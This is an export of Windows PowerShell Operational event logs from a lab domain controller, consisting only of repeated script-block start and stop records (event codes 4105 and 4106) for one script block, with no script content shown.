ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475004
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475003
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475002
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475001
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475000
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474999
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474998
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474997
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474996
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474995
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474994
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474993
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474992
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474991
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474990
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474989
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474988
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474987
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474986
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474985
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474984
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474983
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474982
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474981
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474980
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474979
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474978
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474977
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474976
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474975
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474974
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474973
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474972
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474971
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474970
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474969
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474968
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474967
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474966
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474965
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474964
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474963
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474962
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474961
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474960
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474959
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474958
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474957
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474956
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474955
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474954
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474952
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474950
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
